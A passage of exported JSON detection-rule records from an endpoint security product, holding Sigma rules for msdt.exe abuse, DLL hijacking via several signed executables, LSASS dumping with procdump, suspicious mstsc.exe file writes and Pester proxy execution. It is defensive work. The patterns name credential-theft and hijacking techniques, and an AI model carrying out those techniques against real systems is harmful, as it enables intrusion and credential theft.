exclusion_known_fp_3:\n CommandLine:\n - 'msdt.exe -ep WindowsHelp id SearchDiagnostic'\n - '?:\\Windows\\system32\\msdt.exe -ep WindowsHelp id SearchDiagnostic'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e456468-0899-4a47-967e-a1e508005da6",
"rule_name": "Suspicious msdt.exe Execution",
"rule_description": "Detects suspicious execution patterns of msdt.exe (Microsoft Support Diagnostic Tool), a legitimate Windows troubleshooting utility.\nWhile normally used for system diagnostics, this binary is frequently abused by attackers, particularly Cobalt Strike, through its spawnto technique to masquerade malicious activities as legitimate troubleshooting processes.\nIt is recommended to analyze any associated diagnostic packages, and terminate unauthorized instances while correlating with other Cobalt Strike indicators.\n",
"rule_creation_date": "2022-01-04",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e6d1273-89a6-489b-8d39-0d72e284df91",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593808Z",
"creation_date": "2026-03-23T11:45:34.593811Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ddodiag.yml",
"content": "title: DLL Hijacking via ddodiag.exe\nid: 3e6d1273-89a6-489b-8d39-0d72e284df91\ndescription: |\n Detects potential Windows DLL Hijacking via ddodiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ddodiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fddevquery.dll'\n - '\\propsys.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e6d1273-89a6-489b-8d39-0d72e284df91",
"rule_name": "DLL Hijacking via ddodiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ddodiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3eb7a11a-6332-420e-b874-a943ded0d729",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590248Z",
"creation_date": "2026-03-23T11:45:34.590252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://github.com/FalconForceTeam/FalconFriday/blob/master/Uncategorized/FireEye_red_team_tool_countermeasures.md#hpcustpartuidll-hijack",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hp_colorlaser_jet.yml",
"content": "title: DLL Hijacking via HP ColorLaser Jet software\nid: 3eb7a11a-6332-420e-b874-a943ded0d729\ndescription: |\n Detects potential Windows DLL Hijacking via HP ColorLaser Jet software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://github.com/FalconForceTeam/FalconFriday/blob/master/Uncategorized/FireEye_red_team_tool_countermeasures.md#hpcustpartuidll-hijack\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'HPCustParticUI.exe'\n ProcessSignature: 'Hewlett Packard'\n ImageLoaded|endswith: '\\HPCustPartUI.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\HP\\HP*\\Bin\\'\n - '?:\\Program Files (x86)\\HP\\HP*\\Bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\HP\\HP*\\'\n - '?:\\Program Files (x86)\\HP\\HP*\\'\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hewlett Packard'\n\n condition: selection 
and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3eb7a11a-6332-420e-b874-a943ded0d729",
"rule_name": "DLL Hijacking via HP ColorLaser Jet software",
"rule_description": "Detects potential Windows DLL Hijacking via HP ColorLaser Jet software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ebe7176-c7a6-4c4b-b556-0b91e3b3949d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096515Z",
"creation_date": "2026-03-23T11:45:34.096517Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096522Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eoaexperiences.yml",
"content": "title: DLL Hijacking via EoaExperiences.exe\nid: 3ebe7176-c7a6-4c4b-b556-0b91e3b3949d\ndescription: |\n Detects potential Windows DLL Hijacking via EoaExperiences.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EoaExperiences.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\d2d1.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ebe7176-c7a6-4c4b-b556-0b91e3b3949d",
"rule_name": "DLL Hijacking via EoaExperiences.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EoaExperiences.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ed4eb53-d0ba-458c-9c03-cd4f967cc00b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627660Z",
"creation_date": "2026-03-23T11:45:34.627662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627667Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#procdump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_procdump.yml",
"content": "title: LSASS Process Memory Dumped via procdump\nid: 3ed4eb53-d0ba-458c-9c03-cd4f967cc00b\ndescription: |\n Detects an attempt to dump the LSASS' process memory using procdump.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to check the process launching Procdump for other suspicious activity, such as data exfiltration and to start memory forensics to determine stolen credentials.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#procdump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2021/05/28\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.ProcDump\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n ProcessOriginalFileName: 'procdump'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ed4eb53-d0ba-458c-9c03-cd4f967cc00b",
"rule_name": "LSASS Process Memory Dumped via procdump",
"rule_description": "Detects an attempt to dump the LSASS process memory using procdump.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nThe match is made on the PE original file name rather than the on-disk name, so a renamed copy of procdump is still detected.\nIt is recommended to check the process launching procdump for other suspicious activity, such as data exfiltration, and to start memory forensics to determine which credentials were stolen.\n",
"rule_creation_date": "2021-05-28",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3ed5fbba-cc68-43af-84dc-c9a39e083aaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619065Z",
"creation_date": "2026-03-23T11:45:34.619067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619072Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_onedriveupdater.yml",
"content": "title: DLL Hijacking via OneDriveUpdater\nid: 3ed5fbba-cc68-43af-84dc-c9a39e083aaa\ndescription: |\n Detects a potential Windows DLL search order hijacking via OneDriveUpdater.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n The OneDriveStandaloneUpdater tries to load (version.dll) without specifying its absolute path. By putting a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'OneDriveStandaloneUpdater.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\version.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3ed5fbba-cc68-43af-84dc-c9a39e083aaa",
"rule_name": "DLL Hijacking via OneDriveUpdater",
"rule_description": "Detects a potential Windows DLL search order hijacking via OneDriveUpdater.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nOneDriveStandaloneUpdater.exe tries to load version.dll without specifying an absolute path. By placing a malicious DLL with the same name in the same folder, attackers can execute arbitrary code.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3f29d6d1-df14-4f24-abc0-abe36ac82683",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096091Z",
"creation_date": "2026-03-23T11:45:34.096093Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096098Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "1566_001_written_file_mstsc.yml",
"content": "title: Suspicious File Written by mstsc.exe\nid: 3f29d6d1-df14-4f24-abc0-abe36ac82683\ndescription: |\n Detects a suspicious file written by mstsc.exe.\n Using a specially crafted RDP files, attackers may access users local drives through RDP connections and drop malicious files.\n It is recommended to check the maliciousness of the newly created files and if the connection to the RDP server was legitimate.\nreferences:\n - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2024/10/29\nmodified: 2025/11/07\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '.dll'\n - '.exe'\n - '.com'\n - '.cpl'\n - '.pif'\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.ps1'\n - '.cmd'\n - '.bat'\n - '.wsh'\n - '.hta'\n - '.lnk'\n Path|contains:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\Sysvol\\'\n - '?:\\Users\\Public\\'\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n - '\\Documents\\PowerShell\\profile.ps1'\n - '\\Documents\\WindowsPowerShell\\profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\profile.ps1'\n - '\\Documents\\PowerShell\\\\*_profile.ps1'\n - '\\Documents\\WindowsPowerShell\\\\*_profile.ps1'\n - '\\System32\\WindowsPowerShell\\v1.0\\\\*_profile.ps1'\n - '?:\\Windows\\system32\\spool\\PRTPROCS\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLStart\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Addins\\'\n - '\\AppData\\Roaming\\Microsoft\\Outlook\\VbaProject.OTM'\n Kind:\n - 
'create'\n - 'write'\n ProcessProcessName: 'mstsc.exe'\n\n filter_firstbytes_folder:\n # Folder\n FirstBytes|startswith: '494e445828'\n Kind: 'write'\n\n filter_firstbytes_empty:\n # Empty\n FirstBytes: ''\n Kind: 'write'\n\n filter_fxs:\n Path|startswith: '?:\\Windows\\System32\\FxsTmp\\'\n\n filter_printer:\n Path|startswith:\n - '?:\\Windows\\System32\\spool\\SERVERS\\'\n - '?:\\Windows\\System32\\spool\\PRINTERS\\'\n - '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\'\n\n filter_mstsc_cache:\n Path|contains: '\\Local\\Microsoft\\Terminal Server Client\\Cache\\'\n\n exclusion_wsl:\n ProcessParentImage: '?:\\Windows\\System32\\lxss\\wslhost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3f29d6d1-df14-4f24-abc0-abe36ac82683",
"rule_name": "Suspicious File Written by mstsc.exe",
"rule_description": "Detects a suspicious file written by mstsc.exe.\nUsing specially crafted RDP files, attackers may access users' local drives through RDP connections and drop malicious files.\nIt is recommended to check whether the newly created files are malicious and whether the connection to the RDP server was legitimate.\n",
"rule_creation_date": "2024-10-29",
"rule_modified_date": "2025-11-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3f42c0d2-ec03-4a3a-9f16-edf623d11e19",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087924Z",
"creation_date": "2026-03-23T11:45:34.087926Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087931Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/pester/",
"https://medium.com/@xNEED/pester-ing-lolbas-aadacc075661",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_pester.yml",
"content": "title: Suspicious Pester Execution\nid: 3f42c0d2-ec03-4a3a-9f16-edf623d11e19\ndescription: |\n Detects the suspicious execution of the Pester PowerShell Module.\n The Pester module can be called by the PowerShell command Invoke-Pester and is used to define tests.\n However, the Pester.bat script bundled with power is vulnerable to a proxy execution by injecting a semicolon inside the .bat commandline.\n This legitimate module can be used by attackers to execute arbitrary code to evade detection.\n It is recommended to analyze the executed PowerShell script as well as child processes stemming from PowerShell to look for further malicious actions or contents.\n It is also recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/pester/\n - https://medium.com/@xNEED/pester-ing-lolbas-aadacc075661\n - https://attack.mitre.org/techniques/T1216/\ndate: 2022/11/03\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.LOLBin.Pester\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - '{ Invoke-Pester -EnableExit *;?*}'\n - \"\\\\Pester.psm1'; & { Get-Help *;?*}\"\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3f42c0d2-ec03-4a3a-9f16-edf623d11e19",
"rule_name": "Suspicious Pester Execution",
"rule_description": "Detects the suspicious execution of the Pester PowerShell Module.\nThe Pester module can be called by the PowerShell command Invoke-Pester and is used to define tests.\nHowever, the Pester.bat script bundled with PowerShell is vulnerable to proxy execution by injecting a semicolon inside the .bat command line.\nThis legitimate module can be used by attackers to execute arbitrary code to evade detection.\nIt is recommended to analyze the executed PowerShell script as well as child processes stemming from PowerShell to look for further malicious actions or contents.\nIt is also recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3fb86f3f-25bc-4b7f-916b-aa47252ab35f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623998Z",
